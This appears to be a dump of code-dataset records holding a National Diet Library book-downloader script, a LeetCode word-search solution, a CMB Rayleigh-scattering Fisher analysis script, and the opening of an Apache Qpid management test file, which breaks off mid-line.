{"seq_id":"74658924","text":"#!/usr/bin/python3\r\n\r\nfrom bs4 import BeautifulSoup\r\nfrom PyPDF2 import PdfFileMerger, PdfFileReader\r\nimport requests, time, os, regex#, sys, codecs, re\r\n\r\ndef main():\r\n\tscale = 1 #scale of images (1 = 100%, 2 = 50%, 4 = 25%, 8 = 12.5%, 16 = 6.25%, 32 = 3.125%)\r\n\twaittime = 30 #wait interval between downloads; must be set to at least 30 or IP will be blocked (as of 2014.09.29)\r\n\tjpglimit = 1 #number of simultaneous jpg downloads; currently can't go higher than 1 (as of 2014.09.29)\r\n\tpdflimit = 50 #number of simultaneous pdf page downloads; currently can't go higher than 20 (as of 2014.09.29)\r\n\tbook_ids = []\r\n\turllist = \"ndl_urls.txt\" #file to read urls from\r\n\twith open(urllist, \"r\") as f:\r\n\t\tfor line in f:\r\n\t\t\turl = line.strip()\r\n\t\t\tif url[:35] == \"http://dl.ndl.go.jp/info:ndljp/pid/\":\r\n\t\t\t\tbook_ids.append(url.split(\"/\")[-1])\r\n\t\t\telse:\r\n\t\t\t\tprint(u\"{0} is not a valid url. Please correct the url and try again.\".format(url))\r\n\t\t\t\treturn\r\n\tprint(u\"Choose one of the following options:\")\r\n\tprint(u\"1. Download as jpgs (better quality but much longer download time).\\n2. Download as pdf (lower quality but much shorter download time).\")\r\n\twhile True:\r\n\t\tdownloadmode = input()\r\n\t\tif downloadmode == \"1\": break\r\n\t\telif downloadmode == \"2\": break\r\n\t\telse: print(u\"Invalid input! Input 1 or 2.\")\r\n\tif downloadmode == \"1\": downloadlimit = jpglimit\r\n\telif downloadmode == \"2\": downloadlimit = pdflimit\r\n\tif estimate(book_ids, waittime, downloadmode, downloadlimit):\r\n\t\tfor i in book_ids:\r\n\t\t\turl = \"http://dl.ndl.go.jp/info:ndljp/pid/{}\".format(i)\r\n\t\t\tsoup = BeautifulSoup(requests.get(url).text)\r\n\t\t\ttitle, volume, fulltitle = gettitle(soup)\r\n\t\t\tpage, lastpage = getpages(soup)\r\n\t\t\ttry:\r\n\t\t\t\tos.makedirs(fulltitle, exist_ok=False)\r\n\t\t\texcept OSError:\r\n\t\t\t\tprint(\"Directory \\\"{0}\\\" already exists.\\nProceed anyway and overwrite contents?\".format(fulltitle))\r\n\t\t\t\twhile True:\r\n\t\t\t\t\tchoice = input()\r\n\t\t\t\t\tif choice == \"y\" or choice == \"Y\" or choice == \"yes\" or choice == \"YES\": break\r\n\t\t\t\t\telif choice == \"n\" or choice == \"N\" or choice == \"no\" or choice == \"NO\": return\r\n\t\t\t\t\telse: print(u\"Invalid input! Input yes or no.\")\r\n\t\t\tos.chdir(fulltitle)\r\n\t\t\tif downloadmode == \"1\":\tgetjpgs(fulltitle, page, lastpage, i, scale, waittime, downloadlimit) #download volume as jpgs\r\n\t\t\telif downloadmode == \"2\": getpdfs(fulltitle, page, lastpage, i, scale, waittime, downloadlimit) #download volume as pdf\r\n\t\t\tos.chdir(\"..\")\r\n\r\ndef gettitle(soup): #get title and volume of book\r\n\tif soup.find(\"dt\",text=u\"タイトル (title)\"):#get title\r\n\t\ttitle = soup.find(\"dt\",text=u\"タイトル (title)\").findNext(\"dd\").contents[0].lstrip()\r\n\t\ttitle = replacebadchars(title) #only needed in Windows\r\n\telse:\r\n\t\ttitle = \"No.Title\"\r\n\tif soup.find(\"dt\",text=u\"著者 (creator)\"):#get author\r\n\t\tauthor = soup.find(\"dt\",text=u\"著者 (creator)\").findNext(\"dd\").contents[0].lstrip()\r\n\t\tauthor = regex.sub(r\"\\s+\", \"\", author)\r\n\t\tif author[-1:] == \"著\": author = author[:-1]\r\n\t\tauthor = replacebadchars(author) #only needed in Windows\r\n\telse:\r\n\t\tauthor = \"Unknown\"\r\n\tif soup.find(\"dt\",text=u\"出版年月日(W3CDTF形式) (issued:W3CDTF)\"):#get date of publication\r\n\t\tdate = soup.find(\"dt\",text=u\"出版年月日(W3CDTF形式) (issued:W3CDTF)\").findNext(\"dd\").contents[0].lstrip()\r\n\t\tdate = replacebadchars(date) #only needed in Windows\r\n\telse:\r\n\t\tdate = \"Undated\"\t\r\n\tif soup.find(\"dt\",text=u\"巻次、部編番号 (volume)\"):#get name of volume (if applicable)\r\n\t\tvolume = soup.find(\"dt\",text=u\"巻次、部編番号 (volume)\").findNext(\"dd\").contents[0].lstrip()\r\n\t\tvolume = replacebadchars(volume) #only needed in Windows\r\n\t\tfulltitle = \"{0} ({1}) {2}, {3}\".format(author, date, title, volume) #format of fulltitle with volume information\r\n\telse:\r\n\t\tvolume = \"\"\r\n\t\tfulltitle = \"{0} ({1}) {2}\".format(author, date, title) #format of fulltitle without volume information\r\n\treturn(title, volume, fulltitle)\r\n\r\ndef replacebadchars(string): #necessary if running in Windows\r\n\t#for s in string: print(s, s.encode(\"unicode_escape\"))\r\n\tbadchars = [r\"\\\\\", r\"\\/\", r\"\\:\", r\"\\*\", r\"\\?\", r\"\\\"\", r\"\\<\", r\"\\>\", r\"\\|\"]\r\n\t#fullwidth stand-ins (legal in Windows filenames) for the characters matched above\r\n\tgoodchars = [\"\", \"/\", \":\", \"*\", \"?\", \"”\", \"<\", \">\", \"|\"]\r\n\tfor bad in badchars:\r\n\t\tstring = regex.sub(bad, goodchars[badchars.index(bad)], string)\r\n\t#replace fullwidth numbers and punctuation with halfwidth (comment out next 4 lines if not desired)\r\n\tfullnums = [r\"1\", r\"2\", r\"3\", r\"4\", r\"5\", r\"6\", r\"7\", r\"8\", r\"9\", r\"0\", u\"\\u2212\", r\"[.。]\", r\"[、,]\", r\"(\", r\")\", r\"[\", r\"]\"]\r\n\thalfnums = [\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"0\", \"-\", \".\", \",\", \"(\", \")\", \"[\", \"]\"]\r\n\tfor num in fullnums:\r\n\t\tstring = regex.sub(num, halfnums[fullnums.index(num)], string)\r\n\t#remove all whitespace (comment out next line if not desired)\r\n\tstring = regex.sub(r\"\\s\", \"\", string)\r\n\t#remove 著 after the author's name\r\n\tstring = regex.sub(r\"著\", \"\", string)\r\n\treturn(string)\r\n\r\ndef getpages(soup): #get first and last page of volume\r\n\tpage = 1 #starting page\r\n\tlastpage = 0 #set last page manually here (set to 0 to find last page automatically)\r\n\tif lastpage == 0:\r\n\t\tif soup.find(\"input\", {\"name\":\"lastContentNo\"}):\r\n\t\t\tlastpage = int(soup.find(\"input\", {\"name\":\"lastContentNo\"})[\"value\"]) #find last page automatically\r\n\treturn(page, lastpage)\r\n\r\ndef getjpgs(fulltitle, page, lastpage, book_id, scale, waittime, downloadlimit): #download book\r\n\twhile page <= lastpage:\r\n\t\tfor i in range(0, downloadlimit):\r\n\t\t\tif page < 10:\r\n\t\t\t\t#filename = u\"{0}_000{1}.jpg\".format(fulltitle, page) #full filename\r\n\t\t\t\tfilename = \"000{}.jpg\".format(page) #page number only\r\n\t\t\telif page < 100:\r\n\t\t\t\t#filename = u\"{0}_00{1}.jpg\".format(fulltitle, page) #full filename\r\n\t\t\t\tfilename = \"00{}.jpg\".format(page) #page number only\r\n\t\t\telse:\r\n\t\t\t\t#filename = u\"{0}_0{1}.jpg\".format(fulltitle, page) #full filename\r\n\t\t\t\tfilename = \"0{}.jpg\".format(page) #page number only\r\n\t\t\tprint(u\"Now downloading page {0} of {1} of {2}.\".format(page, lastpage, fulltitle))\r\n\t\t\t#print(u\"Now downloading page {0} of {1}.\".format(page, lastpage)) #for ascii Windows console\r\n\t\t\tpayload = {\"itemId\": \"info:ndljp/pid/{}\".format(book_id), \"contentNo\": page, \"outputScale\": scale}\r\n\t\t\twhile True:\r\n\t\t\t\ttry:\r\n\t\t\t\t\tr = requests.get(\"http://dl.ndl.go.jp/view/jpegOutput\", params=payload)\r\n\t\t\t\t\tr.raise_for_status()\r\n\t\t\t\t\tbreak\r\n\t\t\t\texcept requests.exceptions.HTTPError:\r\n\t\t\t\t\tprint(\"Download error.
Trying again...\")\r\n\t\t\t\t\ttime.sleep(waittime)\r\n\t\t\twith open(filename, \"wb\") as f:\r\n\t\t\t\tf.write(r.content)\r\n\t\t\t\tf.closed\r\n\t\t\t\tpage = page + 1\r\n\t\ttime.sleep(waittime)\r\n\r\ndef getpdfs(fulltitle, page, lastpage, book_id, scale, waittime, downloadlimit): #download book as pdfs (faster but poorer quality)\r\n\tfilenames = []\r\n\twhile page <= lastpage:\r\n\t\tif lastpage < page + downloadlimit - 1:\r\n\t\t\tlastpdfpage = lastpage\r\n\t\telse:\r\n\t\t\tlastpdfpage = page + downloadlimit - 1\r\n\t\tif page < 10:\r\n\t\t\tif lastpdfpage < 10: filename = u\"{0}_000{1}-000{2}.pdf\".format(fulltitle, page, lastpdfpage)\r\n\t\t\telif lastpdfpage < 100: filename = u\"{0}_000{1}-00{2}.pdf\".format(fulltitle, page, lastpdfpage)\r\n\t\t\telse: filename = u\"{0}_000{1}-0{2}.pdf\".format(fulltitle, page, lastpdfpage)\r\n\t\telif page < 100:\r\n\t\t\tif lastpdfpage < 100: filename = u\"{0}_00{1}-00{2}.pdf\".format(fulltitle, page, lastpdfpage)\r\n\t\t\telse: filename = u\"{0}_00{1}-0{2}.pdf\".format(fulltitle, page, lastpdfpage)\t\t\t\r\n\t\telse:\r\n\t\t\tfilename = u\"{0}_0{1}-0{2}.pdf\".format(fulltitle, page, lastpdfpage)\r\n\t\tprint(u\"Now downloading pages {0} to {1} of {2} in {3}.\".format(page, lastpdfpage, lastpage, fulltitle))\r\n\t\t#print(u\"Now downloading pages {0} to {1} of {2}.\".format(page, lastpdfpage, lastpage)) #for ascii Windows console\r\n\t\tpayload = {\"pdfOutputRangeType\": \"R\", \"pdfPageSize\": \"\", \"pdfOutputRanges\": \"{0}-{1}\".format(page, lastpdfpage)}\r\n\t\twhile True:\r\n\t\t\ttry:\r\n\t\t\t\tr = requests.get(\"http://dl.ndl.go.jp/view/pdf/digidepo_{}.pdf\".format(book_id), params=payload)\r\n\t\t\t\tr.raise_for_status()\r\n\t\t\t\tbreak\r\n\t\t\texcept requests.exceptions.HTTPError:\r\n\t\t\t\tprint(\"Download error. 
Trying again...\")\r\n\t\t\t\ttime.sleep(waittime)\r\n\t\twith open(filename, \"wb\") as f:\r\n\t\t\tf.write(r.content)\r\n\t\t\tf.closed\r\n\t\tpage = page + downloadlimit\r\n\t\tfilenames.append(filename)\r\n\t\ttime.sleep(waittime)\r\n\tmergepdfs(fulltitle, filenames)\r\n\r\ndef mergepdfs(fulltitle, filenames):\r\n\tfullfilename = u\"{}.pdf\".format(fulltitle)\r\n\tmerger = PdfFileMerger()\r\n\tfor f in filenames:\r\n\t\tmerger.append(PdfFileReader(open(f, \"rb\")))\r\n\tmerger.write(fullfilename)\r\n\tfor d in filenames:\r\n\t\tos.remove(d)\r\n\r\ndef estimate(book_ids, waittime, downloadmode, downloadlimit): #estimate time to download:\r\n\ttotalpages = 0\r\n\tfor i in book_ids:\r\n\t\turl = \"http://dl.ndl.go.jp/info:ndljp/pid/{}\".format(i)\r\n\t\tsoup = BeautifulSoup(requests.get(url).text)\r\n\t\ttitle, volume, fulltitle = gettitle(soup)\r\n\t\tpage, lastpage = getpages(soup)\r\n\t\tprint(\"Number of pages in {0} = {1}\".format(fulltitle, lastpage))\r\n\t\t#print(u\"Number of pages = {0}\".format(next_lastpage)) #for ascii Windows console\r\n\t\ttotalpages += lastpage\r\n\tm, s = divmod((waittime/downloadlimit) * totalpages, 60)\r\n\th, m = divmod(m, 60)\r\n\th = int(h)\r\n\tm = int(m)\r\n\ts = int(s)\r\n\tif h == 1:\r\n\t\thours = \"1 hour\"\r\n\t\tif m > 0 or s > 0: hours += \", \"\r\n\telif h > 1:\r\n\t\thours = \"{} hours\".format(h)\r\n\t\tif m > 0 or s > 0: hours += \", \"\r\n\telse: hours = \"\"\r\n\tif m == 1:\r\n\t\tminutes = \"1 minute\"\r\n\t\tif s > 0: minutes += \", \"\r\n\telif m > 1:\r\n\t\tminutes = \"{} minutes\".format(m)\r\n\t\tif s > 0: minutes += \", \"\r\n\telse: minutes = \"\"\r\n\tif s == 1: seconds = \"1 second\"\r\n\telif s > 1: seconds = \"{} seconds\".format(s)\r\n\telse: seconds = \"\"\r\n\ttotaltime = \"{0}{1}{2}.\".format(hours, minutes, seconds)\r\n\tprint(u\"Total number of volumes = {0}\".format(len(book_ids)))\r\n\tprint(u\"Total number of pages = {0}.\".format(totalpages))\r\n\tprint(u\"Total time to download = {0}\\nContinue with download?\\n(y/n):\".format(totaltime))\r\n\twhile True:\r\n\t\tchoice = input()\r\n\t\tif choice == \"y\" or choice == \"Y\" or choice == \"yes\" or choice == \"YES\":\r\n\t\t\treturn True\r\n\t\telif choice == \"n\" or choice == \"N\" or choice == \"no\" or choice == \"NO\":\r\n\t\t\treturn False\r\n\t\telse: print(u\"Invalid input! 
Input yes or no.\")\r\n\r\nif __name__ == \"__main__\":\r\n\tmain()\r\n","sub_path":"ndl_auto_2.0.py","file_name":"ndl_auto_2.0.py","file_ext":"py","file_size_in_byte":10141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"557138246","text":"# https://leetcode.com/problems/word-search-ii/description/\nclass Solution(object):\n def findWords(self, board, words):\n \"\"\"\n :type board: List[List[str]]\n :type words: List[str]\n :rtype: List[str]\n \"\"\"\n trie = {}\n self.result = set()\n self.numRows = len(board)\n self.numCols = len(board[0]) if self.numRows else 0\n self.visited = [[False]*self.numCols for _ in range(self.numRows)]\n self.board = board\n for word in words:\n myNode = trie\n for index, ch in enumerate(word):\n if ch in myNode:\n myNode = myNode[ch]\n else:\n myNode[ch] = {}\n myNode = myNode[ch]\n if index == len(word)-1:\n myNode['END'] = None\n for i, row in enumerate(board):\n for j, ch in enumerate(row):\n if ch in trie:\n self.verify(i,j, trie[ch], [ch])\n return list(self.result)\n\n def verify(self, i, j, node, word):\n self.visited[i][j] = True\n points = [(i+1, j), (i-1, j), (i, j+1), (i, j-1)]\n if 'END' in node:\n self.result.add(''.join(word))\n for x, y in points:\n if x < 0 or x >= self.numRows or y < 0 or y >= self.numCols or self.visited[x][y]:\n continue\n ch = self.board[x][y]\n if ch in node:\n self.verify(x, y, node[ch], word + [ch])\n self.visited[i][j] = False\n","sub_path":"word-search-ii.py","file_name":"word-search-ii.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"519514476","text":"import numpy as np \nimport matplotlib.pyplot as plt\nfrom noise_calculator import *\nfrom scipy.stats import norm\nfrom scipy import optimize\nfrom scipy.special import erfinv\n\nLMAX = 4500\n\nprimary_tt,primary_ee,primary_te = np.loadtxt('./data/primary.dat', usecols=(1,2,4), unpack=True)\ncross_tt,cross_ee,cross_te = np.loadtxt('./data/cross_te_500.dat', usecols=(1,2,4), unpack=True)\ncross_et = np.loadtxt('./data/cross_et_500.dat', usecols=(4), unpack=True)\nauto_tt,auto_ee,auto_te = np.loadtxt('./data/auto_500.dat', usecols=(1,2,4), unpack=True)\n\n## ##\n\ndef _covariance(Experiment,lmax = LMAX):\n \"\"\" Compute the noiseless frequency covariance matrix for a given experiment.\n \"\"\"\n freqs = Experiment.freqs\n N = len(freqs)\n cov = np.zeros((lmax-1,2*N,2*N))\n for i in range(N):\n for j in range(N):\n cov[:,i,j] = (primary_tt + ((freqs[i]/500.)**4 + (freqs[j]/500.)**4)*cross_tt + (freqs[i]/500.)**4 * (freqs[j]/500.)**4 * auto_tt)[:lmax-1]\n cov[:,i+N,j+N] = (primary_ee + ((freqs[i]/500.)**4 + (freqs[j]/500.)**4)*cross_ee + (freqs[i]/500.)**4 * (freqs[j]/500.)**4 * auto_ee)[:lmax-1]\n cov[:,i,j+N] = (primary_te + (freqs[i]/500.)**4*cross_et + (freqs[j]/500.)**4*cross_te + (freqs[i]/500.)**4 * (freqs[j]/500.)**4 * auto_te)[:lmax-1]\n cov[:,i+N,j] = (primary_te + (freqs[i]/500.)**4*cross_te + (freqs[j]/500.)**4*cross_et + (freqs[i]/500.)**4 * (freqs[j]/500.)**4 * auto_te)[:lmax-1]\n return cov\n \ndef _covariance_primary(Experiment,lmax = LMAX):\n \"\"\" Compute the noiseless frequency covariance matrix for a given experiment.\n \"\"\"\n freqs = Experiment.freqs\n N = len(freqs)\n cov_primary = np.zeros((lmax-1,2*N,2*N))\n for i in range(N):\n for j in range(N):\n cov_primary[:,i,j] = primary_tt[:lmax-1]\n cov_primary[:,i+N,j+N] = primary_ee[:lmax-1]\n cov_primary[:,i,j+N] = primary_te[:lmax-1]\n 
cov_primary[:,i+N,j] = primary_te[:lmax-1]\n return cov_primary\n \ndef _gaussian(x, amplitude, mean, stddev):\n return amplitude * np.exp(-((x - mean) / 2**.5 / stddev)**2)\n \ndef normalize_eigvect(eigvect):\n \"\"\"Normalize the eigenvectors, i.e. make sure all the entries are positive\"\"\"\n norm = np.ones(eigvect.shape)\n lmax = int(eigvect.shape[0])\n N = eigvect.shape[1]\n for ll in range(lmax-1):\n for i in range(N):\n if np.mean(eigvect[ll,:,i])<0 :\n norm[ll,:,i] = - 1.\n return eigvect.copy()/norm\n \n \ndef save_eigvals_eigvects(Experiment, lmax, file, normalize = True):\n \"\"\" Save the two largest eigenvalues and eigenvector entries corresponding to the \n largest eigenvalue to 'file'. Stored as 'ell*(ell+1)/2pi * lambda'. \"\"\"\n cov = _covariance(Experiment, lmax)\n N = len(Experiment.freqs)\n eigvals_T, eigvects_T = np.linalg.eigh(cov[:,:N,:N])\n eigvals_E, eigvects_E = np.linalg.eigh(cov[:,N:,N:])\n \n eigvals_T_save = eigvals_T[:,(-1,-2)]\n eigvals_E_save = eigvals_E[:,(-1,-2)]\n if normalize :\n eigvects_T_save = normalize_eigvect(eigvects_T)[:,:,-1]\n eigvects_E_save = normalize_eigvect(eigvects_E)[:,:,-1]\n else : \n eigvects_T_save = eigvects_T[:,:,-1]\n eigvects_E_save = eigvects_E[:,:,-1]\n np.savetxt(file + 'eigvals_T', eigvals_T_save, header = 'Temperature : lambda_+, lambda_-')\n np.savetxt(file + 'eigvals_E', eigvals_E_save, header = 'E-mode : lambda_+, lambda_-')\n np.savetxt(file + 'eigvects_T', eigvects_T_save, header = 'Temperature, entries to largest eigvect @ {}'.format(Experiment.freqs))\n np.savetxt(file + 'eigvects_E', eigvects_E_save, header = 'E-mode, entries to largest eigvect @ {}'.format(Experiment.freqs))\n\n \ndef estimate_noise_eigvals(cov,Nl):\n \"\"\" Estimation of the noise on the different eigenvalues, using an ILC \n (cf Hirata's paper) \"\"\"\n N = int(cov.shape[1]/2)\n lmax = int(cov.shape[0])+1\n \n eigvals_T, eigvects_T = np.linalg.eigh(cov[:,:N,:N])\n eigvals_E, eigvects_E = np.linalg.eigh(cov[:,N:,N:])\n\n A_full = np.zeros((lmax-1,2*N,2*N))\n A_full[:,:N,:N] = eigvects_T\n A_full[:,N:,N:] = eigvects_E\n\n cov_diag_full = np.einsum('lji,ljk,lkm -> lim',A_full,cov,A_full)\n ix = np.ix_([N-1,N-2,-1,-2],[N-1,N-2,-1,-2])\n A = A_full[:,:,[N-1,N-2,-2,-1]]\n N_inv = np.linalg.inv(Nl)\n Nl_best = np.linalg.solve(np.einsum('lia,lij,ljb->lab',A,N_inv,A),np.repeat(np.identity(4)[np.newaxis,:, :], lmax-1, axis=0))\n cov_diag = np.zeros((lmax-1,4,4))\n for ll in range(lmax-1):\n cov_diag[ll,:,:] = cov_diag_full[ll,...][ix]\n return Nl_best,cov_diag\n \ndef eigval_primary(cov,cov_primary):\n \"\"\" Compute the diagonal covmat obtained when there is no RS in the covmat \n but we are still looking for it in the ILC.\"\"\"\n N = int(cov.shape[1]/2)\n lmax = int(cov.shape[0])+1\n \n eigvals_T, eigvects_T = np.linalg.eigh(cov[:,:N,:N])\n eigvals_E, eigvects_E = np.linalg.eigh(cov[:,N:,N:])\n\n A_full = np.zeros((lmax-1,2*N,2*N))\n A_full[:,:N,:N] = eigvects_T\n A_full[:,N:,N:] = eigvects_E\n\n cov_diag_full = np.einsum('lji,ljk,lkm -> lim',A_full,cov_primary,A_full)\n ix = np.ix_([N-1,N-2,-1,-2],[N-1,N-2,-1,-2])\n A = A_full[:,:,[N-1,N-2,-2,-1]]\n cov_diag_prim = np.zeros((lmax-1,4,4))\n for ll in range(lmax-1):\n cov_diag_prim[ll,:,:] = cov_diag_full[ll,...][ix]\n return cov_diag_prim\n \ndef get_fisher_eigvals(Experiment,lmax=LMAX):\n \"\"\" Compute the Fisher matrix for the 8 non-zero elements of the diagonalized covariance matrix.\n \"\"\"\n ell = np.linspace(2,lmax,lmax-1)\n freqs = Experiment.freqs\n N = len(freqs)\n Nl = Experiment.compute_noise(lmax)\n cov = _covariance(Experiment,lmax)\n Nl_best,cov_diag = estimate_noise_eigvals(cov,Nl)\n inv_cov = np.linalg.solve(cov_diag+Nl_best,np.broadcast_to(np.identity(4),(lmax-1,4,4)))\n elem_list = [[0,0],[1,1],[2,2],[3,3],[0,2],[0,3],[1,2],[1,3]]\n deriv = np.zeros((8,4,4))\n signals = np.zeros((lmax-1,8))\n for kk,elem in enumerate(elem_list):\n ii = elem[0]\n jj = elem[1]\n deriv[kk,ii,jj] = 1.\n deriv[kk,jj,ii] = 1.\n signals[:,kk] = cov_diag[:,jj,ii]\n fisher = Experiment.fsky*np.einsum('l,lij,ajk,lkm,bmi -> lab', (2*ell+1)/2.,inv_cov,deriv,inv_cov,deriv)\n return fisher, signals\n \ndef print_SN(fisher,signals,lmax):\n \"\"\" Print S/N of the eigenvalues, marginalising over the others.\"\"\"\n elem_list = [[0,0],[1,1],[2,2],[3,3],[0,2],[0,3],[1,2],[1,3]]\n labels = ['T1','T2','E1','E2']\n error_cov = np.linalg.inv(fisher)\n for kk,elem in enumerate(elem_list):\n [ii,jj] = elem\n SN2 = signals[:,kk]**2 / error_cov[:,kk,kk]\n SN = SN2.sum()**.5\n print('SN {:s}{:s} : {:3.2f}'.format(labels[ii], labels[jj], SN))\n \n \ndef get_SN_corr(Experiment,lmax):\n \"\"\" Compute the S/N of the correlated RS signal.\"\"\"\n cov = _covariance(Experiment,lmax)\n cov_primary = _covariance_primary(Experiment,lmax)\n fisher, signals = get_fisher_eigvals(Experiment, lmax)\n cov_diag_prim = eigval_primary(cov,cov_primary)\n error_cov = np.linalg.inv(fisher)\n N_steps = 10000\n beta_array = np.linspace(1-2,1+2,N_steps)\n chi_sqr_TT = np.zeros((lmax-1,N_steps))\n chi_sqr_TE = np.zeros((lmax-1,N_steps))\n chi_sqr_EE = np.zeros((lmax-1,N_steps))\n for k,beta in enumerate(beta_array):\n chi_sqr_TT[:,k] = ((signals[:,0] - beta*cov_diag_prim[:,0,0])**2 / error_cov[:,0,0])\n chi_sqr_TE[:,k] = ((np.abs(signals[:,4]) - beta * np.abs(cov_diag_prim[:,0,2]))**2 / error_cov[:,4,4])\n chi_sqr_EE[:,k] = ((signals[:,2] - beta * cov_diag_prim[:,2,2])**2 / error_cov[:,2,2])\n SN2 = np.zeros((3,lmax-1))\n for ll in range(lmax-1):\n loglike_TT = np.exp(-chi_sqr_TT[ll,:])\n loglike_TE = np.exp(-chi_sqr_TE[ll,:])\n loglike_EE = np.exp(-chi_sqr_EE[ll,:])\n popt_TT,_ = optimize.curve_fit(_gaussian,beta_array,loglike_TT,p0=[.5,1.,1.], maxfev=5000)\n popt_TE,_ = optimize.curve_fit(_gaussian,beta_array,loglike_TE,p0=[.5,1.,1.], maxfev=5000)\n popt_EE,_ = optimize.curve_fit(_gaussian,beta_array,loglike_EE,p0=[.5,1.,1.], maxfev=5000)\n# print(popt_TT)\n\n SN2[0,ll] = np.abs(1. - popt_TT[1])/np.abs(popt_TT[2])**2\n SN2[1,ll] = np.abs(1. - popt_TE[1])/np.abs(popt_TE[2])**2\n SN2[2,ll] = np.abs(1. - popt_EE[1])/np.abs(popt_EE[2])**2\n# plt.figure()\n# plt.plot(SN2[0])\n# plt.show()\n\n \n print('Correlated TT : {:3.2f}'.format(SN2[0].sum()**.5))\n print('Correlated TE : {:3.2f}'.format(SN2[1].sum()**.5))\n print('Correlated EE : {:3.2f}'.format(SN2[2].sum()**.5))\n\n\n \ndef plot_all(fisher,signals,lmax,label):\n \"\"\" Plot the 8 non-zero elements of the diagonalized covariance matrix, \n their S/N per mode as well as the cumulative S/N.\"\"\"\n error_cov = np.linalg.inv(fisher)\n labels = ['T1','T2','E1','E2']\n elem_list = [[0,0],[1,1],[2,2],[3,3],[0,2],[0,3],[1,2],[1,3]]\n\n ell = np.linspace(2,lmax,lmax-1)\n for kk,elem in enumerate(elem_list):\n [ii,jj] = elem\n f,[ax1,ax2] = plt.subplots(2,1,sharex = True,gridspec_kw={'height_ratios': [2, 1]},figsize=(10,6))\n plt.subplots_adjust(wspace=0, hspace=0,left=0.1,right=0.9,top = 0.9,bottom=0.1)\n ax1.plot(ell,(signals[:,kk]**2)**.5, c = 'k', lw = 2)\n SN2 = signals[:,kk]**2 / error_cov[:,kk,kk]\n ax_cp = ax1.twinx()\n ax_cp.plot(ell,SN2**.5, c = 'r', ls = 'dashed')\n ax2.plot(ell,(np.cumsum(SN2))**.5, c = 'r')\n ax_cp.tick_params(axis='y', labelcolor='r')\n ax_cp.set_ylabel(r'S/N per mode', fontsize = 14, color='r')\n ax1.set_ylabel(r'',fontsize = 14)\n ax2.set_xlim(2,LMAX)\n ax2.set_ylabel(r'Cumulative S/N', fontsize = 14)\n ax2.set_xlabel(r'$\\ell$', fontsize = 18)\n plt.suptitle('{:s}x{:s}'.format(labels[ii],labels[jj]))\n\n plt.show()\n \nif __name__ == '__main__':\n \n print('PLANCK')\n fisher, signals = get_fisher_eigvals(PLANCK,lmax=2500)\n save_eigvals_eigvects(PLANCK, lmax=2500, file='./data/eigvals/PLANCK', normalize = True)\n# print_SN(fisher, signals,lmax=2500)\n get_SN_corr(PLANCK,2500)\n print()\n print('SO LAT')\n fisher, signals = get_fisher_eigvals(SO_LAT,lmax=4500)\n# print_SN(fisher, signals,lmax=4500)\n get_SN_corr(SO_LAT,4500)\n print()\n print('CCAT')\n fisher, signals = get_fisher_eigvals(CCAT,lmax=4500)\n# print_SN(fisher, signals,lmax=4500)\n get_SN_corr(CCAT,4500)\n\n\n\n\n \n \n# plot_all(fisher,signals,4500,'SO_LAT')\n \n","sub_path":"RS_SNR_eigvals.py","file_name":"RS_SNR_eigvals.py","file_ext":"py","file_size_in_byte":10560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"436014534","text":"#\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied.
See the License for the\n# specific language governing permissions and limitations\n# under the License.\n#\n\nfrom __future__ import absolute_import\nfrom qpid.datatypes import Message, RangedSet\nfrom qpid.testlib import TestBase010\nfrom qpid.management import managementChannel, managementClient\nfrom threading import Condition\nfrom time import sleep\nimport qmf.console\nimport qpid.messaging\nfrom qpid.messaging.exceptions import Empty\nfrom qpidtoollibs import BrokerAgent\n\nclass ManagementTest (TestBase010):\n\n def setup_access(self):\n if 'broker_agent' not in self.__dict__:\n self.conn2 = qpid.messaging.Connection(self.broker)\n self.conn2.open()\n self.broker_agent = BrokerAgent(self.conn2)\n return self.broker_agent\n\n \"\"\"\n Tests for the management hooks\n \"\"\"\n\n def test_broker_connectivity_oldAPI (self):\n \"\"\"\n Call the \"echo\" method on the broker to verify it is alive and talking.\n \"\"\"\n session = self.session\n \n mc = managementClient ()\n mch = mc.addChannel (session)\n\n mc.syncWaitForStable (mch)\n brokers = mc.syncGetObjects (mch, \"broker\")\n self.assertEqual (len (brokers), 1)\n broker = brokers[0]\n args = {}\n body = \"Echo Message Body\"\n args[\"body\"] = body\n\n for seq in range (1, 5):\n args[\"sequence\"] = seq\n res = mc.syncCallMethod (mch, broker.id, broker.classKey, \"echo\", args)\n self.assertEqual (res.status, 0)\n self.assertEqual (res.statusText, \"OK\")\n self.assertEqual (res.sequence, seq)\n self.assertEqual (res.body, body)\n mc.removeChannel (mch)\n\n def test_methods_sync (self):\n \"\"\"\n Call the \"echo\" method on the broker to verify it is alive and talking.\n \"\"\"\n session = self.session\n self.startQmf()\n \n brokers = self.qmf.getObjects(_class=\"broker\")\n self.assertEqual(len(brokers), 1)\n broker = brokers[0]\n\n body = \"Echo Message Body\"\n for seq in range(1, 20):\n res = broker.echo(seq, body)\n self.assertEqual(res.status, 0)\n self.assertEqual(res.text, \"OK\")\n self.assertEqual(res.sequence, seq)\n self.assertEqual(res.body, body)\n\n def test_get_objects(self):\n self.startQmf()\n\n # get the package list, verify that the qpid broker package is there\n packages = self.qmf.getPackages()\n assert 'org.apache.qpid.broker' in packages\n\n # get the schema class keys for the broker, verify the broker table and link-down event\n keys = self.qmf.getClasses('org.apache.qpid.broker')\n broker = None\n linkDown = None\n for key in keys:\n if key.getClassName() == \"broker\": broker = key\n if key.getClassName() == \"brokerLinkDown\" : linkDown = key\n assert broker\n assert linkDown\n\n brokerObjs = self.qmf.getObjects(_class=\"broker\")\n assert len(brokerObjs) == 1\n brokerObjs = self.qmf.getObjects(_key=broker)\n assert len(brokerObjs) == 1\n\n def test_self_session_id (self):\n self.startQmf()\n sessionId = 